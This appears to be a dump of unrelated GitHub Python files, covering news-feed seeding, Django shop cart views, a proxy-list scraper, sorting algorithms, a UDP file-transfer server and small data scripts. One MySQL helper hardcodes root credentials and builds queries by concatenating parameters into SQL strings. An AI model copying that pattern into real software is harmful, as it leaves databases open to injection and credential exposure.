Economist\"),\n \"url\": \"https://www.youtube.com/@TheEconomist\",\n \"active\": True,\n \"feed_ordering\": \"d\",\n \"full_text_fetch\": \"Y\",\n \"feed_type\": \"y-channel\",\n \"importance\": 1,\n },\n {\n \"name\": \"YouTube Channel\",\n \"publisher\": Publisher.objects.get(name=\"Harvard Business Review\"),\n \"url\": \"https://www.youtube.com/@harvardbusinessreview\",\n \"active\": True,\n \"feed_ordering\": \"d\",\n \"full_text_fetch\": \"Y\",\n \"feed_type\": \"y-channel\",\n \"importance\": 2,\n },\n {\n \"name\": \"YouTube Channel\",\n \"publisher\": Publisher.objects.get(name=\"Wall Street Journal\"),\n \"url\": \"https://www.youtube.com/@wsj\",\n \"active\": True,\n \"feed_ordering\": \"d\",\n \"full_text_fetch\": \"Y\",\n \"feed_type\": \"y-channel\",\n \"importance\": 2,\n },\n {\n \"name\": \"YouTube Channel\",\n \"publisher\": 
Publisher.objects.get(name=\"Stuff Made Here\"),\n \"url\": \"https://www.youtube.com/@StuffMadeHere\",\n \"active\": True,\n \"feed_ordering\": \"d\",\n \"full_text_fetch\": \"Y\",\n \"feed_type\": \"y-channel\",\n \"importance\": 0,\n },\n {\n \"name\": \"YouTube Channel\",\n \"publisher\": Publisher.objects.get(name=\"Teulu Tribe\"),\n \"url\": \"https://www.youtube.com/@TeuluTribe\",\n \"active\": True,\n \"feed_ordering\": \"d\",\n \"full_text_fetch\": \"Y\",\n \"feed_type\": \"y-channel\",\n \"importance\": 1,\n },\n {\n \"name\": \"YouTube Channel\",\n \"publisher\": Publisher.objects.get(name=\"Deutsche Welle\"),\n \"url\": \"https://www.youtube.com/@DWDocumentary\",\n \"active\": True,\n \"feed_ordering\": \"d\",\n \"full_text_fetch\": \"Y\",\n \"feed_type\": \"y-channel\",\n \"importance\": 2,\n },\n {\n \"name\": \"YouTube Channel\",\n \"publisher\": Publisher.objects.get(name=\"CNBC\"),\n \"url\": \"https://www.youtube.com/@CNBC\",\n \"active\": True,\n \"feed_ordering\": \"d\",\n \"full_text_fetch\": \"Y\",\n \"feed_type\": \"y-channel\",\n \"importance\": 2,\n },\n {\n \"name\": \"TED - YouTube Channel\",\n \"publisher\": Publisher.objects.get(name=\"TED\"),\n \"url\": \"https://www.youtube.com/@TED\",\n \"active\": True,\n \"feed_ordering\": \"d\",\n \"full_text_fetch\": \"Y\",\n \"feed_type\": \"y-channel\",\n \"importance\": 2,\n },\n {\n \"name\": \"TEDed - YouTube Channel\",\n \"publisher\": Publisher.objects.get(name=\"TED\"),\n \"url\": \"https://www.youtube.com/@TEDEd\",\n \"active\": True,\n \"feed_ordering\": \"d\",\n \"full_text_fetch\": \"Y\",\n \"feed_type\": \"y-channel\",\n \"importance\": 1,\n },\n {\n \"name\": \"YouTube Channel\",\n \"publisher\": Publisher.objects.get(name=\"Vox\"),\n \"url\": \"https://www.youtube.com/@Vox\",\n \"active\": True,\n \"feed_ordering\": \"d\",\n \"full_text_fetch\": \"Y\",\n \"feed_type\": \"y-channel\",\n \"importance\": 1,\n },\n {\n \"name\": \"YouTube Channel\",\n \"publisher\": Publisher.objects.get(name=\"Wendover Productions\"),\n \"url\": \"https://www.youtube.com/@Wendoverproductions\",\n \"active\": True,\n \"feed_ordering\": \"d\",\n \"full_text_fetch\": \"Y\",\n \"feed_type\": \"y-channel\",\n \"importance\": 1,\n },\n {\n \"name\": \"YouTube Channel\",\n \"publisher\": Publisher.objects.get(name=\"BigThink\"),\n \"url\": \"https://www.youtube.com/@bigthink\",\n \"active\": True,\n \"feed_ordering\": \"d\",\n \"full_text_fetch\": \"Y\",\n \"feed_type\": \"y-channel\",\n \"importance\": 1,\n },\n {\n \"name\": \"YouTube Channel\",\n \"publisher\": Publisher.objects.get(name=\"EconomicsExplained\"),\n \"url\": \"https://www.youtube.com/@EconomicsExplained\",\n \"active\": True,\n \"feed_ordering\": \"d\",\n \"full_text_fetch\": \"Y\",\n \"feed_type\": \"y-channel\",\n \"importance\": 2,\n },\n {\n \"name\": \"YouTube Channel\",\n \"publisher\": Publisher.objects.get(name=\"RealEngineering\"),\n \"url\": \"https://www.youtube.com/@RealEngineering\",\n \"active\": True,\n \"feed_ordering\": \"d\",\n \"full_text_fetch\": \"Y\",\n \"feed_type\": \"y-channel\",\n \"importance\": 1,\n },\n {\n \"name\": \"World Services - YouTube Playlist\",\n \"publisher\": Publisher.objects.get(name=\"BBC\"),\n \"url\": \"https://www.youtube.com/playlist?list=PLz_B0PFGIn4fADt3h_U2SOWErIq-xtXPD\",\n \"active\": True,\n \"feed_ordering\": \"d\",\n \"full_text_fetch\": \"Y\",\n \"feed_type\": \"y-playlist\",\n \"importance\": 1,\n },\n ]\n\n for feed in initial_feeds:\n Feed(**feed).save()\n\n initial_pages = [\n {\n \"position_index\": 
1,\n \"html_icon\": \"\",\n \"name\": \"Frontpage\",\n \"url_parameters\": \"categories=frontpage\",\n },\n {\n \"position_index\": 2,\n \"html_icon\": (\n ''\n ),\n \"name\": \"German\",\n \"url_parameters\": \"language=de\",\n },\n {\n \"position_index\": 3,\n \"html_icon\": \"#\",\n \"name\": \"Tech\",\n \"url_parameters\": \"categories=tech\",\n },\n {\n \"position_index\": 4,\n \"html_icon\": (\n ''\n ),\n \"name\": \"Latest: Funds\",\n \"url_parameters\": \"special=sidebar\",\n },\n {\n \"position_index\": 5,\n \"html_icon\": \"@\",\n \"name\": \"FT & BBG\",\n \"url_parameters\": (\n \"publisher__name=financial+times,bloomberg&content_type=article\"\n ),\n },\n {\n \"position_index\": 6,\n \"html_icon\": (\n ''\n ),\n \"name\": \"Videos\",\n \"url_parameters\": \"content_type=video\",\n },\n {\n \"position_index\": 7,\n \"html_icon\": (\n ' '\n ),\n \"name\": \"Read Later\",\n \"url_parameters\": \"read_later=true\",\n },\n ]\n\n for page in initial_pages:\n Page(**page).save()\n","repo_name":"vanalmsick/news_platform","sub_path":"feeds/management/commands/add_default_feeds.py","file_name":"add_default_feeds.py","file_ext":"py","file_size_in_byte":35728,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"67"} +{"seq_id":"19518945663","text":"from __future__ import annotations\n\nfrom metadsl import *\nfrom metadsl_rewrite import *\n\nfrom .abstraction import *\nfrom .conversion import *\nfrom .either import *\nfrom .integer import *\nfrom .maybe import *\nfrom .pair import *\nfrom .strategies import *\nfrom .vec import *\n\n\nclass Int(Expression):\n @expression\n @classmethod\n def from_int(cls, i: int) -> Int:\n ...\n\n\nclass Str(Expression):\n @expression\n @classmethod\n def from_str(cls, s: str) -> Str:\n ...\n\n\n@rule\ndef convert_to_int(i: int, s: str) -> R[Maybe[Int]]:\n yield Converter[Int].convert(i), lambda: Maybe.just(Int.from_int(i))\n yield Converter[Int].convert(s), Maybe[Int].nothing()\n\n\n@rule\ndef convert_to_str(i: int, s: str) -> R[Maybe[Str]]:\n yield Converter[Str].convert(s), lambda: Maybe.just(Str.from_str(s))\n yield Converter[Str].convert(i), Maybe[Str].nothing()\n\n\nvec_convert = register.tmp(convert_to_str, convert_to_int)\n\n\nclass TestVec:\n def test_getitem(self):\n assert execute(Vec.create(10, 11)[Integer.from_int(1)]) == 11\n\n def test_append(self):\n assert execute(Vec.create(10).append(11)) == Vec.create(10, 11)\n\n @vec_convert\n def test_convert_empty(self):\n assert execute(Converter[Vec[Int]].convert(())) == Maybe.just(Vec[Int].create())\n\n @vec_convert\n def test_convert_items(self):\n assert execute(Converter[Vec[Int]].convert((1, 2))) == Maybe.just(\n Vec.create(Int.from_int(1), Int.from_int(2))\n )\n\n @vec_convert\n def test_invalid_conversion(self):\n assert (\n execute(Converter[Vec[Int]].convert((1, \"hi\"))) == Maybe[Vec[Int]].nothing()\n )\n assert (\n execute(Converter[Vec[Int]].convert((\"hi\", 1))) == Maybe[Vec[Int]].nothing()\n )\n assert (\n execute(Converter[Vec[Int]].convert((\"hi\",))) == Maybe[Vec[Int]].nothing()\n )\n\n def test_pop(self):\n assert execute(Vec.create(10, 11).pop()) == Pair.create(Vec[int].create(10), 11)\n","repo_name":"metadsl/metadsl","sub_path":"metadsl_core/vec_test.py","file_name":"vec_test.py","file_ext":"py","file_size_in_byte":2001,"program_lang":"python","lang":"en","doc_type":"code","stars":97,"dataset":"github-code","pt":"67"} +{"seq_id":"16792375111","text":"from django.shortcuts import render, HttpResponse\n\nfrom rest_framework import viewsets, 
generics\n\nfrom .models import Empleado, Empresa\n\nfrom .serializer import EmpresaSerializer, EmpleadoSerializer, EmpresaNameSerializer\n\n# Create your views here.\n\n\nclass EmpresaList(viewsets.ModelViewSet):\n queryset = Empresa.objects.all()\n serializer_class = EmpresaSerializer\n\n\nclass EmpleadoList(viewsets.ModelViewSet):\n queryset = Empleado.objects.all()\n serializer_class = EmpleadoSerializer\n\nclass EmpresaListName(viewsets.ModelViewSet):\n queryset = Empresa.objects.all()\n serializer_class = EmpresaNameSerializer\n\n\nclass EmployeeListByCompany(viewsets.ModelViewSet):\n serializer_class = EmpleadoSerializer\n\n def get_queryset(self):\n company_id = self.kwargs['company_id']\n return Empleado.objects.filter(id_empresa=company_id)\n\n\ndef home(request):\n return HttpResponse(\"Hola Mundo\")","repo_name":"lucianohuenuvil/TuEmpleadoPerfecto","sub_path":"TuEmpleadoPerfecto-Back/TuEmpleadoPerfecto/mainApp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":917,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"35738168920","text":"import copy\nfrom data_processing import data_processing_config\n\n#impute_feature(turbine_group, \"1528-22\", \"MDY01-CT009-XQ50\", mean_for_temp_main)\ndef impute_feature(turbine_group, new_values, turbine_name=data_processing_config.TURBINE_NAME, feature_id=data_processing_config.FEATURE_ID):\n \"\"\"\n Impute the values of a turbine's feature\n Parameters:\n -----------\n turbine_group: dict\n A dictionary storing a set of dataframes as values with keys as turbine names \n turbine_name: str\n A string with the name of the turbine (i.e. \"1528-22\")\n feature_id: str\n A string with the suffix of the feature to be used for calculation. i.e. 
\"MDY01-CT009-XQ50\"\n new_values: pandas.Series\n A pandas series with the values to be used to impute\n Return:\n -------\n dict\n A new dictionary storing a set of dataframes as values with keys as turbine names\n \"\"\"\n imputed_turbine_group = copy.deepcopy(turbine_group)\n\n for key, value in imputed_turbine_group.items():\n if key == turbine_name:\n value[feature_id] = new_values.values\n\n return imputed_turbine_group\n ","repo_name":"Haizhuolaojisite/Anomaly_Detection","sub_path":"data_processing/impute_feature.py","file_name":"impute_feature.py","file_ext":"py","file_size_in_byte":1143,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"42378450061","text":"from scrapy.contrib.spiders import CrawlSpider, Rule\nfrom scrapy.selector import HtmlXPathSelector\nfrom scrapy.contrib.linkextractors.sgml import SgmlLinkExtractor\n\nfrom redis import StrictRedis\n\n\nclass ProxySpider (CrawlSpider):\n name = 'cnproxy'\n allowed_domains = ['www.cnproxy.com']\n start_urls = ['http://www.cnproxy.com/proxy1.html',]\n rules = (\n Rule(SgmlLinkExtractor(allow=('http://www.cnproxy.com/proxy\\d+.html',)), callback='parse_item',),\n #Rule(SgmlLinkExtractor(allow=('.*',)),),\n )\n redis_cli = StrictRedis(host='localhost', port=6379, db=0)\n \n mapping = {'z':\"3\", 'm':\"4\", 'a':\"2\", 'l':\"9\", 'f':\"0\", 'b':\"5\", 'i':\"7\", 'w':\"6\", 'x':\"8\", 'c':\"1\" }\n \n def parse_item(self, response):\n hxs = HtmlXPathSelector(response)\n trs = hxs.select('//div[@id=\"proxylisttb\"]/table[3]/tr')\n trs.remove(trs[0])\n \n for tr in trs:\n o = tr.select('td[1]/script/text()').extract()[0][:-1].split('+')\n o.remove(o[0])\n try:\n port = ''.join([self.mapping[c] for c in o])\n except KeyError:\n prot = ':80'\n \n proxy = '%s://%s:%s' % (tr.select('td[2]/text()').extract()[0], tr.select('td[1]/text()').extract()[0], port)\n self.redis_cli.sadd('proxies', proxy)\n \n pass\n \n \n\n","repo_name":"hankya/questions","sub_path":"exampapers/spiders/cnproxy.py","file_name":"cnproxy.py","file_ext":"py","file_size_in_byte":1382,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"31555937009","text":"# coding=utf-8\nfrom django.db import models\n\nfrom solo.models import SingletonModel\n\n\nclass InstallProgress(SingletonModel):\n \"\"\"\n Keeps track of the installation progress\n \"\"\"\n installed = models.BooleanField(default=False)\n\n site_name_ok = models.BooleanField(default=False)\n modules_ok = models.BooleanField(default=False)\n menu_ok = models.BooleanField(default=False)\n\n @classmethod\n def site_name_set(cls):\n \"\"\"\n Marks the site name as set\n :return:\n \"\"\"\n progress, created = cls.objects.get_or_create()\n progress.site_name_ok = True\n progress.save()\n\n @classmethod\n def is_site_name_set(cls):\n progress, created = cls.objects.get_or_create()\n return progress.site_name_ok\n\n @classmethod\n def modules_set(cls):\n \"\"\"\n Marks the modules as selected\n :return:\n \"\"\"\n progress, created = cls.objects.get_or_create()\n progress.modules_ok = True\n progress.save()\n\n @classmethod\n def is_modules_set(cls):\n progress, created = cls.objects.get_or_create()\n return progress.modules_ok\n\n @classmethod\n def menu_set(cls):\n \"\"\"\n Marks the menu as set up\n :return:\n \"\"\"\n progress, created = cls.objects.get_or_create()\n progress.menu_ok = True\n progress.save()\n\n @classmethod\n def is_menu_set(cls):\n progress, created = cls.objects.get_or_create()\n 
return progress.menu_ok\n\n @classmethod\n def finish(cls):\n \"\"\"\n Checks that all parts of the installation are completed, then marks it as installed\n \"\"\"\n progress, created = cls.objects.get_or_create()\n if progress.site_name_ok and progress.modules_ok and progress.menu_ok:\n progress.installed = True\n else:\n progress.installed = False\n progress.save()\n\n @classmethod\n def is_finished(cls):\n \"\"\"\n :return: A boolean indicating whether the installation is finished or not.\n \"\"\"\n progress, created = cls.objects.get_or_create()\n return progress.installed\n","repo_name":"Lundis/SAW","sub_path":"studassweb/install/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2155,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"21242748703","text":"# Histograms of values at certain timestamps (e.g. 3 am)\n\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport os\n\n# read csv, dates is in column 1, and reset the indexing\ndf = (pd.read_csv(os.path.join('data', 'withWeather', 'data_with_weather_2021-08-24.csv'),\n parse_dates=[1])\n .reset_index(drop=True)\n )\n\n# create a list of dataframes\nsensor_names = ['Ruecklauf', 'Vorlauf']\nsensors = []\nfor nPos in [0, 7]:\n sensors.append(df.loc[df['Position'] == nPos, ['Timestamp', 'Value']]\n .reset_index(drop=True)\n )\n\nhour = 12\n\nfig, axs = plt.subplots(nrows = 2, ncols = 1, sharex = True, sharey = True)\nbins = np.arange(15, 55, 0.2)\n\n# plot histograms at the hour\nfor n in [0, 1]:\n data = sensors[n].loc[sensors[n]['Timestamp'].dt.hour == hour, ['Value']]\n axs[n].hist(data, bins)\n axs[n].set_title('BW' + sensor_names[n])\n\nplt.xticks(ticks = bins[::5])\nplt.xlabel('Temperatures, degrees C')\nfig.supylabel('Frequency')\nfig.suptitle('Condensing boiler (BW) temperatures, hour ' + str(hour) + ', entire dataset')\nplt.show()","repo_name":"hattamisra/SigmaHeat-data-analysis","sub_path":"aa_final_files/histogram.py","file_name":"histogram.py","file_ext":"py","file_size_in_byte":1118,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"24648732621","text":"__author__ = 'edwardvella'\n\n\ndef bubble_sort(arr):\n \"\"\"\n Performs a bubble sort algorithm.\n :param arr: an unsorted array\n :return: a sorted array\n \"\"\"\n arr_len = len(arr)\n swaps = True\n while swaps:\n swaps = False\n for i in range(0, arr_len - 1):\n if arr[i] > arr[i + 1]:\n # swap the items\n temp = arr[i]\n arr[i] = arr[i + 1]\n arr[i + 1] = temp\n swaps = True\n return arr\n\n\ndef heap_sort(arr):\n \"\"\"\n Performs a heap sort algorithm\n :param arr: an unsorted array\n :return: a sorted array\n \"\"\"\n from Sorting.HeapSorting import HeapSorting\n heap = HeapSorting(arr)\n for i in range(0, len(arr))[::-1]:\n heap.swap(0, i)\n heap.heap_size -= 1\n heap.max_heapify(0)\n return heap.A\n\n\ndef quick_sorting(arr):\n \"\"\"\n Performs a quick sort algorithm\n :param arr: an unsorted array\n :return: a sorted array\n \"\"\"\n from Sorting.QuickSorting import QuickSort\n quicksort = QuickSort(arr)\n quicksort.quick_sort(0, len(arr) - 1)\n return quicksort.A\n\n\narray = [4, 1, 3, 2, 16, 9, 10, 14, 8, 7]\ntarget_array = [1, 2, 3, 4, 7, 8, 9, 10, 14, 
16]\nquick_sorting(array)\n","repo_name":"dwardu89/learning-python-programming","sub_path":"Sorting/Sorter.py","file_name":"Sorter.py","file_ext":"py","file_size_in_byte":1244,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"17943261948","text":"\nimport pandas as pd\nimport jieba\n\nimport string\nimport time\nimport traceback\n\nimport pymysql\nimport requests\nimport re\n\nfrom bs4 import BeautifulSoup\nfrom flask import json\nimport nltk\nfrom nltk.corpus import brown\n\n#数据库的连接与查询\n\n\ndef get_conn_mysql():\n \"\"\"\n :return: 连接,游标192.168.1.102\n \"\"\"\n # 创建连接\n conn = pymysql.connect(host=\"127.0.0.1\",\n user=\"root\",\n password=\"123456\",\n db=\"new_class\",\n charset=\"utf8\")\n # 创建游标\n cursor = conn.cursor() # 执行完毕返回的结果集默认以元组显示\n return conn, cursor\ndef close_conn_mysql(conn, cursor):\n if cursor:\n cursor.close()\n if conn:\n conn.close()\ndef query_mysql(sql,*args):\n \"\"\"\n 封装通用查询\n :param sql:\n :param args:\n :return: 返回查询结果以((),(),)形式\n \"\"\"\n conn,cursor = get_conn_mysql();\n cursor.execute(sql)\n res=cursor.fetchall()\n close_conn_mysql(conn,cursor)\n return res\n\n#插入数据库\ndef insert_into_mysql(content,channelName,title):\n conn,cursor=get_conn_mysql()\n sql=\"insert into newdata (content,channelName,title) values(%s,%s,%s)\"\n cursor.execute(sql,[content,channelName,title])\n conn.commit()\n close_conn_mysql(conn,cursor)\n#pandas读取分批插入数据库\ndef pandas_read():\n file_path = \"data/xlsx/财经.xlsx\"\n df = pd.read_excel(file_path)\n print(df.shape[0])\n print(df.iloc[0, :][\"content\"])\n for i in range(df.shape[0]):\n try:\n insert_into_mysql(df.iloc[i, :][\"content\"], df.iloc[i, :][\"channelName\"], df.iloc[i, :][\"title\"])\n except:\n print(\"NO\")\n#各类文章数统计\ndef class_text_num():\n sql=\"SELECT count(channelName) as num,channelName FROM new_class.newdata group by channelName;\"\n res=query_mysql(sql)\n return res\n#最深层\ndef deep_2(type):\n sql=\"select title from new_class.newdata where channelName='\"+type+\"'\"\n res=query_mysql(sql)\n return res\n#按题目查询文章内容\ndef find_content_by_title(title):\n sql=\"select content from new_class.newdata where title='\"+title+\"'\"\n res=query_mysql(sql)\n return res\n#查询所有文章\ndef find_all_new():\n sql=\"select content from new_class.newdata \"\n res = query_mysql(sql)\n return res\n#查询各类的文章\ndef find_type(type):\n sql=\"select content from new_class.newdata where channelName='\"+type+\"'\"\n res = query_mysql(sql)\n return res\n\nif __name__ == '__main__':\n pass","repo_name":"LINAN1345272421/new_wordcloud","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2550,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"73867461652","text":"from django.shortcuts import render, get_object_or_404, redirect\nfrom Shop.models import Product\nfrom Order.models import Cart, CartToOrder\n\nfrom coupon.forms import CouponForm\nfrom coupon.models import Coupon\nfrom django.utils import timezone\n\nfrom Notification.notifications import SendNotification\n# Create your views here.\n\ndef add_to_cart(request, pk):\n if request.user.is_authenticated:\n item = get_object_or_404(Product, pk=pk)\n order_item = Cart.objects.get_or_create(item=item, user=request.user, purchased=False)\n order_qs = CartToOrder.objects.filter(user=request.user, ordered=False)\n\n if order_qs.exists():\n order = order_qs[0]\n if order.orderitems.filter(item=item).exists():\n variant = request.POST.get('variant')\n color = 
request.POST.get('color')\n quantity = request.POST.get('quantity')\n if quantity:\n order_item[0].quantity += int(quantity)\n else:\n order_item[0].quantity += 1\n order_item[0].variant=variant\n order_item[0].color=color\n order_item[0].save()\n\n return redirect('Shop:home')\n else:\n variant = request.POST.get('variant')\n color = request.POST.get('color')\n order_item[0].variant=variant\n order_item[0].color=color\n order.orderitems.add(order_item[0])\n\n return redirect('Shop:home')\n else:\n order = CartToOrder(user=request.user)\n order.save()\n order.orderitems.add(order_item[0])\n return redirect('Shop:home')\n else:\n return redirect('Login:user_login')\n\n\ndef cart_view(request):\n if request.user.is_authenticated:\n carts = Cart.objects.filter(user=request.user, purchased=False)\n orders = CartToOrder.objects.filter(user=request.user, ordered=False)\n code=\"\"\n total_price_with_discount=0\n if carts.exists() and orders.exists():\n order = orders[0]\n coupon_form = CouponForm(request.POST)\n if coupon_form.is_valid():\n\n current_time = timezone.now()\n code = coupon_form.cleaned_data.get('code')\n coupon_object = Coupon.objects.get(code=code, active_status=True)\n if coupon_object.valid_to >= current_time:\n get_discount = (coupon_object.discount / 100) * order.get_totals_price()\n total_price_with_discount = order.get_totals_price() - get_discount\n request.session['discount_total'] = total_price_with_discount\n request.session['coupon_code'] = code\n return redirect('Order:cart')\n else:\n coupon_object.active_status = False\n coupon_object.save()\n\n total_price_with_discount = request.session.get('discount_total')\n coupon_code = request.session.get('coupon_code')\n context = {\n 'carts': carts,\n 'order': order,\n 'coupon_form': coupon_form,\n 'coupon_code': coupon_code,\n 'total_price_with_discount': total_price_with_discount,\n }\n return render(request, 'Shop/cart.html', context)\n else:\n return redirect('Login:user_login')\n\n\n\n\ndef remove_from_cart(request, pk):\n item = get_object_or_404(Product, pk=pk)\n orders = CartToOrder.objects.filter(user=request.user, ordered=False)\n if orders.exists():\n order = orders[0]\n if order.orderitems.filter(item=item).exists():\n order_item = Cart.objects.filter(item=item, user=request.user, purchased=False)[0]\n order.orderitems.remove(order_item)\n order_item.delete()\n return redirect('Order:cart')\n else:\n return redirect('Order:cart')\n else:\n return redirect('Order:cart')\n\n\ndef increase_quantity(request, pk):\n item = get_object_or_404(Product, pk=pk)\n order_qs = CartToOrder.objects.filter(user=request.user, ordered=False)\n if order_qs.exists():\n order = order_qs[0]\n if order.orderitems.filter(item=item).exists():\n order_item = Cart.objects.filter(item=item, user=request.user, purchased=False)[0]\n if order_item.quantity >= 1:\n order_item.quantity += 1\n order_item.save()\n return redirect('Order:cart')\n else:\n return redirect('Store:home')\n else:\n return redirect('Shop:home')\n else:\n return redirect('Shop:home')\n\ndef decrease_quantity(request, pk):\n item = get_object_or_404(Product, pk=pk)\n order_qs = CartToOrder.objects.filter(user=request.user, ordered=False)\n if order_qs.exists():\n order = order_qs[0]\n if order.orderitems.filter(item=item).exists():\n order_item = Cart.objects.filter(item=item, user=request.user, purchased=False)[0]\n if order_item.quantity > 1:\n order_item.quantity -= 1\n order_item.save()\n return redirect('Order:cart')\n else:\n order.orderitems.remove(order_item)\n 
order_item.delete()\n return redirect('Shop:home')\n else:\n return redirect('Shop:home')\n else:\n return redirect('Shop:home')\n","repo_name":"engnraminul/Aminul-Mart","sub_path":"Order/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5517,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"6675476031","text":"import os\nimport shutil\n\n\"\"\"\n 需求:在经历imgSizeMove程序后,想要将文件夹内的数个文件夹里的第一张图片移动到一起\n 本代码实现将数个文件夹中的第一张图片移动到一起\n 复制:shutil.copy()\n\"\"\"\ndef main():\n img_dirs = r'E:\\test/' # 需要遍历的图片文件夹\n done_dirs = r'E:\\img/' # 保存的文件夹\n path = os.listdir(img_dirs)\n total = len(path)\n print('共%d张图片!' % total)\n for i in path:\n sizeDir = os.listdir(img_dirs + i)\n # 遍历子文件夹\n for j in sizeDir:\n print(img_dirs + i + '/' + j)\n # 移动第一张图片\n shutil.move(img_dirs + str(i) + '/' + j, done_dirs + str(i) + '.' + j.split('.')[1])\n break\n\n\nif __name__ == '__main__':\n main()\n\n print('已完成')","repo_name":"yl2018ing/study-python","sub_path":"python-tool/move-tool/imgFirstMove.py","file_name":"imgFirstMove.py","file_ext":"py","file_size_in_byte":843,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"21540838363","text":"import socket\nimport sys\nfrom Packet import Packet\nfrom Packet import calculate2ByteChecksum\nfrom Packet import extract_data\nimport time\nimport random\n# Simple_ftp_server port# file-name p\nclient_ip = sys.argv[1]\nclient_port_number = int(sys.argv[2])\nfilename = sys.argv[3]\nprobability_of_loss = float(sys.argv[4])\nserver_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n# client_ip = '127.0.0.1'\nbind_port = 7735\nserver_socket.bind(('', bind_port))\nserver_socket.settimeout(20)\n# server.listen(5) # max backlog of connections\nreceived_packets = []\ntry:\n RTTs = []\n while True:\n CURRENT_SEQUENCE_NUMBER = 0\n Window = []\n RTT = 0\n startRTTCalc = True\n repeatSeq = 0\n repeatSeqCount=0\n # num_of_packets = 0\n # num_drop = 0\n with open(filename, 'w') as outfile:\n while True:\n request, address = server_socket.recvfrom(1050)\n # print(request)\n if request == b'ITERATE':\n print(\"RTTs: \", RTTs)\n print(\"avg RTT\", sum(RTTs)/len(RTTs))\n print(\"-------------------------------------------------------------------\")\n RTTs = []\n startRTTCalc = True\n break\n if request == b'END':\n print(\"Done sending\")\n RTT = time.time() - RTT\n RTTs.append(RTT)\n startRTTCalc = True\n break\n if startRTTCalc:\n RTT = time.time()\n startRTTCalc = False\n checksum = calculate2ByteChecksum(request)\n received_checksum = request[4]<<8\n received_checksum = received_checksum + request[5]\n data = extract_data(request)\n # num_of_packets += 1\n if checksum == received_checksum and random.uniform(0, 1) > probability_of_loss:\n if CURRENT_SEQUENCE_NUMBER == int(data[0]):\n # print(\"DATA:\\t\",data[3].decode(\"utf-8\"))\n outfile.write(data[3].decode(\"utf-8\"))\n packet = Packet(int(data[0]), 43690)\n server_socket.sendto(packet.packetData, (client_ip, client_port_number))\n # repeatSeq = CURRENT_SEQUENCE_NUMBER\n CURRENT_SEQUENCE_NUMBER += 1\n # repeatSeqCount = 0\n # else:\n # packet = Packet(int(data[0]), 43690)\n # server_socket.sendto(packet.packetData, (client_ip, client_port_number))\n # else:\n # num_drop = 1\n # print(\"dropped\")\n # if repeatSeq == data[0]:\n # repeatSeqCount += 1\n # if repeatSeqCount > 5:\n # packet = Packet(int(repeatSeq), 43690)\n # server_socket.sendto(packet.packetData, (client_ip, client_port_number))\n # 
CURRENT_SEQUENCE_NUMBER += 1\n # print(\"Packet loss, sequence number =\", data[0], \"curr_seq: \",CURRENT_SEQUENCE_NUMBER)\n # print(\"drop percent:\", num_drop*100/float(num_of_packets))\nexcept Exception as e:\n print(e)\n print(\"Connection broken\")\n","repo_name":"uddhavb/Go-Back-N-ARQ-and-Selective-Repeat-ARQ","sub_path":"Server1.py","file_name":"Server1.py","file_ext":"py","file_size_in_byte":3404,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"28268003883","text":"\"\"\"Задача 3\nНаибольший простой делитель\nПростые делители числа 13195 - это 5, 7, 13 и 29.\n\nКаков самый большой делитель числа 600851475143, являющийся простым числом?\n\"\"\"\n\ntaskNumber = 600851475143\ndevider = taskNumber -1 \nfinish = False\nprint('task number is ', taskNumber)\n\ndef checkSimple (value): \n count = 0\n i = value -1 \n while i > 2: \n count += 1\n i -= 1 \n if value % i == 0 : \n print('not simple, number', value, 'devided on',i)\n return False \n if count == value - 3:\n print('Biggest simple ', value)\n return True\n\n'''if checkSimple(taskNumber) == True:\n finish = True'''\n\nwhile not finish: \n while taskNumber % devider != 0 and devider > 2 : \n devider -= 1 \n if checkSimple(devider) != True and devider > 2:\n devider -= 1\n else: finish= True\n \n","repo_name":"zeeenjaaa/ProjectEulerExercisesPython","sub_path":"3/3.py","file_name":"3.py","file_ext":"py","file_size_in_byte":1019,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"30580806699","text":"#第一行有整数n(0 0:\n\t\t\t# Obtengo todos los juegos de base de datos de los que usan code\n\t\t\tcode = ' '.join(args)\n\t\t\t# Verifico que sean 3 pistas y que no sean vacias o espacios.\n\t\t\tif len([x for x in code.split(',') if x.strip()]) == 3:\n\t\t\t\t# Si puso la cantidad de pistas correctas sigo\n\t\t\t\tmensaje_error = \"\"\t\t\t\n\t\t\t\tgames_tipo = MainController.getGamesByTipo('Decrypt')\t\t\t\t\t\t\n\t\t\t\tbtns, cid = get_choose_game_buttons(games_tipo, uid, fase_actual = 'Set_Reference', commando_origen = 'code', callback_command = 'choosegamerefDE')\n\t\t\t\tuser_data[uid] = code\n\t\t\t\t\n\t\t\t\tif len(btns) != 0:\n\t\t\t\t\tif len(btns) == 0:\n\t\t\t\t\t\t#Si es solo 1 juego lo hago automatico\n\t\t\t\t\t\tgame = get_game(cid)\n\t\t\t\t\t\tadd_propose(bot, game, uid, code)\n\t\t\t\t\telse:\n\t\t\t\t\t\ttxtBoton = \"Cancel\"\n\t\t\t\t\t\tdatos = \"-1*choosegamerefDE*\" + \"prop\" + \"*\" + str(uid)\n\t\t\t\t\t\tbtns.append([InlineKeyboardButton(txtBoton, callback_data=datos)])\n\t\t\t\t\t\tbtnMarkup = 